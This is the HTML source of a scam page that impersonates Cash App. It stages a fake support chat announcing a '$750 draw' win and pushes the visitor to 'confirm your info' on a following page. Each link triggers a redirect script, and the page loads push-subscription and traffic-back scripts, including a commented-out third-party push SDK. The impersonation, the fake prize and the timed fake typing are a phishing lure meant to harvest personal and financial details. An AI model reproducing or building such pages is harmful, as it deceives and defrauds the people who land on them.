<!DOCTYPE html>
<html lang="en">
<head>
<!-- <script async data-cfasync="false">
       const url = new URL(window.location.href);
       const clickID = url.searchParams.get("click_id");
       const sourceID = url.searchParams.get("source_id");

       const s = document.createElement("script");
       s.dataset.cfasync = "false";
       s.src = "https://system-notify.app/f/sdk.js?z=614545";
       s.onload = (opts) => {
           opts.zoneID = 614545;
           opts.extClickID = clickID;
           opts.subID1 = sourceID;
           opts.actions.onPermissionGranted = () => {};
           opts.actions.onPermissionDenied = () => {};
           opts.actions.onAlreadySubscribed = () => {};
           opts.actions.onError = () => {};
       };
       document.head.appendChild(s);
</script> -->
<meta name="referrer" content="no-referrer">
        <meta name="robots" content="noindex, nofollow, noarchive">
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <link rel="icon" href="favicon.png" type="image/x-icon">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <title>Cash App Chat</title>
  <link href="https://fonts.googleapis.com/css?family=Roboto:400,500&display=swap" rel="stylesheet">
  <style>
    html,
    body {
      padding: 0;
      margin: 0;
      height: 100%;
      box-sizing: border-box;
    }
    * {
      box-sizing: inherit;
    }
    body {
      background-color: #000;
      font-family: 'Roboto', sans-serif;
      font-size: 16px;
    }
    img {
      max-width: 100%;
      height: auto;
    }
    .container {
      max-width: 100%;
      min-height: auto;
	  margin: 0 auto;
      overflow: hidden;
      background-color: #000;
    }
    .chat-header {
      display: flex;
      position: relative;
      align-items: center;
      padding: 11px 19px;
      background-color: #00d54b;
      color: #000;
      box-shadow: rgba(0, 0, 0, .14) 0 1px 2px;
    }
    .chat-icon:not(:last-child) {
      margin-right: 1rem;
    }
    .back-icon {
      margin-right: 1rem;
    }
    .chat-user {
      display: flex;
    }
    .chat-header .chat-user-avatar {
      float: left;
    }
    .chat-user-avatar {
      width: 40px;
      height: 40px;
      position: relative;
      margin-right: 1rem;
    }
    .chat-user-info {
      display: flex;
      flex-direction: column;
      justify-content: space-between;
      align-content: flex-start;
      padding: 3px 0;
    }
    .chat-user-name {
      font-weight: 500;
    }
    .chat-user-status {
      font-size: .9rem;
      color: #fff;
    }
	 .chat-user-status2 {
      text-align: center;
	  font-size: .7rem;
	  padding-top: 10px;
      color: #ccc;
    }
	 .chat-user-status3 {
      text-align: center;
	  font-size: .7rem;
	  padding-top: 5px;
      color: #ccc;
    }
    .chat-user-avatar::before {
      content: "";
      position: absolute;
      right: 0;
      bottom: 0;
      width: 11px;
      height: 11px;
      border-radius: 50%;
      border: 3px solid #fff;
      background-color: #42B72A;
    }
    .chat-action-buttons {
      display: flex;
      margin-left: auto;
    }
    .main-content {
      padding-top: 12px;
      padding-right: 13px;
      padding-bottom: 0px;
      padding-left: 13px;
      background-color: #fff;
	
    }
    .chat-window {
      min-height: 450px;
	  
    }
    .date-divider {
      margin-bottom: .7rem;
      text-align: center;
      font-size: 0.8rem;
      color: #ccc;
    }
    .messages-batch {
      display: flex;
      align-items: flex-end;
    }
    .messages-container {
      max-width: 80%;
      display: flex;
      flex-direction: column;
      align-items: flex-start;
    }
    .message {
      background-color: #efefef;
      padding: 1rem;
      border-radius: 0 5rem 5rem 0;
      display: none;
	  
    }
    .message:first-child {
      border-top-left-radius: 5rem;
    }
    .message:last-child {
      border-bottom-left-radius: 5rem;
    }
    .message:not(:last-child) {
      margin-bottom: 2px;
    }
    .chat-response-actions {
      display: flex;
      align-items: center;
      border: 0px solid #efefef;
	  background-color: #00d54b; 
      border-right: none;
      border-left: none;
      border-bottom-left-radius: .1rem;
      border-bottom-right-radius: .1rem;
      padding: .5rem 13px;
      margin: 0 -13px;
	  box-shadow: rgba(0, 0, 0, .14) -2px -2px 2px;
    }
    .chat-input-field {
      flex-grow: 1;
      margin-right: 1.5rem;
      background-color: #F2F3F4;
      border-radius: 3rem;
      color: #ccc;
      padding: .7rem 1rem;
    }
    .chat-window-indicator {
      margin-top: 1rem;
      margin-bottom: 1rem;
      color: #ccc;
      font-size: .8rem;
    }
    .chat-window-response {
      margin-top: 12px;
      display: none;
    }
  </style>
      
<script>var pm_tag = 'decpl';var pm_delay = '4000';var pm_pid = "11397-dab3c5a4";</script>
</head>
<body>
  <div class="container">
 <!-- <center><div class="chat-icon"><img src="img/upp.png" alt=""></center></div>-->
    <div class="chat-header">
     <!-- <a href="https://mobilecontent4u1.com/click.php?lp=1"> <div class="chat-icon back-icon"><img src="img\arrow-back-2x.png" alt=""></div></a> -->
	 <a href="javascript:void(0)" onclick="go();PreventExitPop=false" rel="noreferrer"> <div class="chat-icon back-icon"><img src="img\arrow-back-2x.png" alt=""></div></a>
      <div class="chat-user">
        <div class="chat-user-avatar">
         <!-- <a href="https://mobilecontent4u1.com/click.php?lp=1"> <img src="img\specialist-avatar-2x.png" alt=""></a> -->
		 <a href="javascript:void(0)" onclick="go();PreventExitPop=false" rel="noreferrer"> <img src="img\specialist-avatar-2x.png" alt=""></a>
        </div>
        <div class="chat-user-info">
          <div class="chat-user-name">Angelina Marriens</div>
          <div class="chat-user-status">Active now</div>
        </div>
      </div>
      <div class="chat-action-buttons">

        <div class="chat-icon"><img src="img\phone-icon-2x.png" alt=""></div>
        <div class="chat-icon"><img src="img\information-icon-2x.png" alt=""></div>
      </div>
    </div>
    <div class="main-content">
      <div class="chat-window">
        <div class="date-divider">Thd 11:01</div>
        <div class="messages-batch">
          <div class="chat-user-avatar">
            <img src="img\specialist-avatar-2x.png" alt="">
          </div>
          <div class="messages-container">
            <div class="message">
              Hey, Angie here from Cash App👋
            </div>
            <div class="message">
              Congratulations, your account won our $750 draw!
            </div>
            <div class="message">
              As part of the Cash App 2023 Rewards Program
            </div>
            <div class="message">
              Confirm your info on the next page and use your reward anywhere you would like!
            </div>
            <div class="message">
              Click the code to access your reward on the next page: <strong><a href="javascript:void(0)" onclick="go();PreventExitPop=false" rel="noreferrer"><font color="00b630">CS75-SM-07</font></a></strong>
            </div>
          </div>
        </div>
        <div class="chat-window-response">
          Your code is <strong>CS75-SM-07</strong><br>
          Redirecting to Confirmation Page...
        </div>
      </div>
      <div class="chat-window-indicator">
        Rachel Marriens is typing<span class="chat-window-indicator-dots"></span>
      </div>
      <div class="chat-response-actions">
        <div class="chat-icon"><img src="img\dots.png" alt=""></div>
        <div class="chat-icon"><img src="img\camera.png" alt=""></div>
        <div class="chat-icon"><img src="img\picture.png" alt=""></div>
        <div class="chat-icon"><img src="img\microphone.png" alt=""></div>
        <div class="chat-input-field">Aa</div>
      <a href="javascript:void(0)" onclick="go();PreventExitPop=false" rel="noreferrer"> <div class="chat-icon"><img src="img\thumb.png" alt=""></div></a>
      </div>
    </div>
	<div class="chat-user-status2"> SIGN IN | BITCOIN | SUPPORT | STATUS </div>
	<div class="chat-user-status3"> ©Square, Inc </div></div>
	<center><div class="chat-icon"><img src="img\upp.png" alt=""></div></center>
  
  <span id="demo"></span>
  <script>
    var dateElement = document.querySelector('.date-divider');
    var currentDateObj = new Date();
    var days = ['Sun', 'Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat'];
    var currentDay = days[currentDateObj.getDay()];
    var currentTime = currentDateObj.getHours() + ':' + currentDateObj.getMinutes();
    dateElement.innerHTML = currentDay + ' ' + currentTime;
  </script>
  <script>
    var statusDotsElement = document.querySelector('.chat-window-indicator-dots'),
      dotsNumber = 1;
    setInterval(function () {
      if (dotsNumber == 4) dotsNumber = 1;
      statusDotsElement.innerHTML = Array.apply(null, { length: dotsNumber + 1 }).join(' . ');
      dotsNumber++;
    }, 500);
  </script>
  <script>
    var messagesCollection = document.querySelectorAll('.messages-container .message'),
      delay = 300,
      messagesCounter = 0,
      messagesDelayMap = [1000, 1800, 3000, 3700, 1500];
    for (var message of messagesCollection) {
      !function (delayLength, message, messagesCounter) {
        setTimeout(function () {
          message.style.display = 'block';
          if (messagesCounter == messagesCollection.length - 1) document.querySelector('.chat-window-indicator').style.display = 'none';
        }, delay);
      }(delay, message, messagesCounter);
      delay += messagesDelayMap[messagesCounter];
      messagesCounter++;
    }
  </script>
  <span id="demo"></span>
	<script type="text/javascript" src="../../trafficback.js" async></script>   
	<script type="text/javascript" src="../../pushsubs.js" async></script>
	<script type="text/javascript" src="../../domain.js" async></script>
	<!-- <script type="text/javascript" src="../../backunderlink.js" async></script> -->
	<!-- <script src="https://backunder.com/script.js"></script> -->	
</body>

</html>
